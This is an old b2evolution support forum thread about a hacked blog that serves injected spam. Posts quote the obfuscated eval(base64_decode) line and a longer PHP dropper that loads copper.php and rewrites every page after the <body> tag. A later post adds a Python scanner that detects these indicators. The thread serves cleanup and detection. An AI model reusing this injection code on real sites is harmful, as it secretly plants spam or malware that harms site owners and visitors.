1 Nov 19, 2008 19:01    

My b2evolution Version: 1.9.x

http://www.privatjokr.com/index.php?disp=comments

Any idea how that happened? Or what I need to do to make it go away? Sorry if this is an obvious fix.

2 Nov 19, 2008 22:34

You may want to upgrade to the latest b2evolution version. Also consider changing your passwords.
Well, I've no experience with b2evo v1.9.x, so I can't really help you, sorry.

3 Nov 22, 2008 05:39

Here's the code you should delete from skins/custom/_main.php

<? /**/eval(base64_decode('aWYoZTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

p.s.
It's a lot longer than in my example. And try to find the file named copper.php, use search in files/directories. Rename it or delete it (at your own risk) when you find this file.

4 Nov 22, 2008 08:11

What version of coppermine gallery are you running?

¥

5 Nov 22, 2008 15:39

¥åßßå, it has nothing to do with coppermine gallery, it's just a file generating spam.

You may want to read this.
http://www.tinyportal.net/index.php?action=printpage;topic=26106.0
http://www.xoops.org/modules/newbb/viewtopic.php?post_id=297046

BTW, here's the full code I found in nelsonguirado's index.main.php

if( function_exists('ob_start') && !isset($GLOBALS['sh_no']) )
{
	// guard so the dropper only runs once per request
	$GLOBALS['sh_no'] = 1;
	if( file_exists('/LONG_PATH/copper.php') )
	{
		// copper.php defines gml(), which returns the spam markup to inject
		include_once('/LONG_PATH/copper.php');
		if( function_exists('gml') && !function_exists('dgobh') )
		{
			if( !function_exists('gzdecode') )
			{
				// polyfill for PHP builds without gzdecode(): skip the gzip header, then inflate the rest
				function gzdecode( $R20FD65E9C7406034FADC682F06732868 )
				{
					$R6B6E98CDE8B33087A33E4D3A497BD86B = ord( substr($R20FD65E9C7406034FADC682F06732868,3,1) ); // FLG byte
					$R60169CD1C47B7A7A85AB44F884635E41 = 10; // fixed gzip header length
					$R0D54236DA20594EC13FC81B209733931 = 0;

					if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 4 ) // FEXTRA: skip the extra field
					{
						$R0D54236DA20594EC13FC81B209733931 = unpack( 'v', substr($R20FD65E9C7406034FADC682F06732868,10,2) );
						$R0D54236DA20594EC13FC81B209733931 = $R0D54236DA20594EC13FC81B209733931[1];
						$R60169CD1C47B7A7A85AB44F884635E41 += 2 + $R0D54236DA20594EC13FC81B209733931;
					}

					if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 8 ) // FNAME: skip the NUL-terminated file name
					{
						$R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
					}

					if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 16 ) // FCOMMENT: skip the NUL-terminated comment
					{
						$R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
					}

					if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 2 ) // FHCRC: skip the header CRC16
					{
						$R60169CD1C47B7A7A85AB44F884635E41 += 2;
					}
					$RC4A5B5E310ED4C323E04D72AFAE39F53 = gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));

					if( $RC4A5B5E310ED4C323E04D72AFAE39F53 === FALSE ) // not gzip after all: pass the data through unchanged
					{
						$RC4A5B5E310ED4C323E04D72AFAE39F53 = $R20FD65E9C7406034FADC682F06732868;
					}
					return $RC4A5B5E310ED4C323E04D72AFAE39F53;
				}
			}

			// output-buffer callback: decompress the finished page and splice gml() in right after the <body> tag
			function dgobh($RDA3E61414E50AEE968132F03D265E0CF)
			{
				Header('Content-Encoding: none');

				$R3E33E017CD76B9B7E6C7364FB91E2E90 = gzdecode($RDA3E61414E50AEE968132F03D265E0CF);

				if( preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90) )
				{
					return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
				}
				else
				{
					return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90; // no <body>: prepend the spam instead
				}
			}
			ob_start('dgobh'); // every page rendered from here on passes through dgobh()
		}
	}
}
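
The two posts above give enough indicators to scan a whole web root for this infection: the eval(base64_decode(...)) one-liner from post 3, and from post 5 the copper.php include, the $GLOBALS['sh_no'] guard, the $R + 32-hex-digit variable names the obfuscator produces, the ob_start('dgobh') callback and the preg_replace splice after <body>. The following is an added example and is not code from this thread or from b2evolution. It walks a directory, scans every PHP file for those indicators, decodes any base64 literal passed to base64_decode() so the payload can be read, and flags a file when a strong indicator or two or more obfuscated variable names are present. The sample files are constructed here from the snippets in the thread (the /LONG_PATH/copper.php placeholder is the poster's); the choice of which indicators count as strong is my own.

```python
"""Scan a web root for the indicators of the copper.php / dgobh infection
discussed in this thread.  Added example: the indicators are lifted from the
code posted above; the sample files and the strong/weak split are my own."""
import base64
import os
import re
import tempfile
from typing import Dict, List

# Indicator regexes.  Each one corresponds to a line of the posted dropper.
INDICATORS = {
    # the one-liner found in skins/custom/_main.php
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    # the output-buffer callback that rewrites every page
    "ob_start_callback": re.compile(r"ob_start\s*\(\s*['\"]dgobh['\"]\s*\)"),
    # any reference to the dropped payload file
    "copper_php": re.compile(r"copper\.php"),
    # the run-once guard the dropper sets
    "sh_no_guard": re.compile(r"\$GLOBALS\s*\[\s*['\"]sh_no['\"]\s*\]"),
    # the obfuscator renames every variable to $R + 32 upper-case hex digits
    "hex_variables": re.compile(r"\$R[0-9A-F]{32}\b"),
    # the spam is spliced in right after the <body ...> tag
    "body_injection": re.compile(r"preg_replace\s*\(\s*['\"]/\(\\<body"),
}
# Any one of these is enough to call the file infected; the rest corroborate.
STRONG = {"eval_base64", "ob_start_callback", "copper_php", "body_injection"}


def decode_base64_payloads(text: str) -> List[str]:
    """Decode every literal handed to base64_decode() so the payload can be read."""
    payloads = []
    for m in re.finditer(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", text):
        try:
            payloads.append(base64.b64decode(m.group(1), validate=True).decode("latin-1"))
        except ValueError:  # binascii.Error is a ValueError: not valid base64, skip it
            continue
    return payloads


def scan_source(text: str) -> Dict[str, int]:
    """Return {indicator: count} for each indicator present (distinct names for hex vars)."""
    hits = {}
    for name, rx in INDICATORS.items():
        found = rx.findall(text)
        if found:
            hits[name] = len(set(found)) if name == "hex_variables" else len(found)
    return hits


def is_infected(hits: Dict[str, int]) -> bool:
    """A strong indicator, or two or more obfuscated variable names, marks the file."""
    return bool(set(hits) & STRONG) or hits.get("hex_variables", 0) >= 2


def scan_tree(root: str, exts=(".php", ".inc", ".phtml")) -> Dict[str, Dict[str, int]]:
    """Walk root and return the indicator hits for every PHP file that has any."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                text = fh.read().decode("latin-1")  # never fail on binary junk
            hits = scan_source(text)
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


# Constructed samples.  INFECTED_SKIN mimics the one-liner from post 3 (its base64
# is the poster's truncated copy); INFECTED_INDEX is a trimmed copy of the dropper
# from post 5 (gzdecode polyfill left out); CLEAN_FILE uses base64_decode legitimately.
INFECTED_SKIN = ("<? /**/eval(base64_decode('aWYoZTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>\n"
                 "<html><body><h1>My blog</h1></body></html>\n")
INFECTED_INDEX = r"""<?php
if( function_exists('ob_start') && !isset($GLOBALS['sh_no']) )
{
    $GLOBALS['sh_no'] = 1;
    if( file_exists('/LONG_PATH/copper.php') )
    {
        include_once('/LONG_PATH/copper.php');
        function dgobh($RDA3E61414E50AEE968132F03D265E0CF)
        {
            $R3E33E017CD76B9B7E6C7364FB91E2E90 = gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
            return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
        }
        ob_start('dgobh');
    }
}
"""
CLEAN_FILE = "<?php\nob_start();\necho base64_decode('aGVsbG8=');\n"


def demo() -> Dict[str, bool]:
    """Write the samples into a scratch web root, scan it, return {file: infected?}."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "skins", "custom"))
        samples = {
            os.path.join("skins", "custom", "_main.php"): INFECTED_SKIN,
            "index.main.php": INFECTED_INDEX,
            "conf.php": CLEAN_FILE,
        }
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        report = scan_tree(root)
        return {rel: is_infected(report.get(rel, {})) for rel in samples}


if __name__ == "__main__":
    for path, infected in demo().items():
        print(f"{'INFECTED' if infected else 'clean   '} {path}")
```

Pointed at a real document root, scan_tree() returns one entry per file with hits; the decoded base64 of the skin one-liner shows the ob_start('dgobh') call even in the truncated copy, while a plain base64_decode() of a string (CLEAN_FILE) is not flagged on its own.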

6 Nov 22, 2008 16:04

That's cool, but for the file to be edited the attacker needed a door ;)

They're both running different evo versions and they're both running coppermine, just not sure of the versions.

¥

7 Nov 22, 2008 16:08

That's the reason why privatjokr should change his passwords (and check other files/scripts for vulnerabilities).

8 Nov 22, 2008 16:14

This virus is known to enter through an upload in FCKEditor (v2.3). The solution is to upgrade that to 2.6.

9 Dec 11, 2008 07:26

Yabba may be on to something. Another site I have, www.magnasquids.com, had Coppermine and its SMF forum was hacked with the same copper thing.

My hacked blog, on another server, had a Coppermine installation in the same directory.

By the way, I love blogging again, thanks to you guys. I hope you guys stick around for a long time.

11 Oct 05, 2011 21:46

Thanks for the reply! Interesting... Perhaps I will revisit after some sleep then... ;)
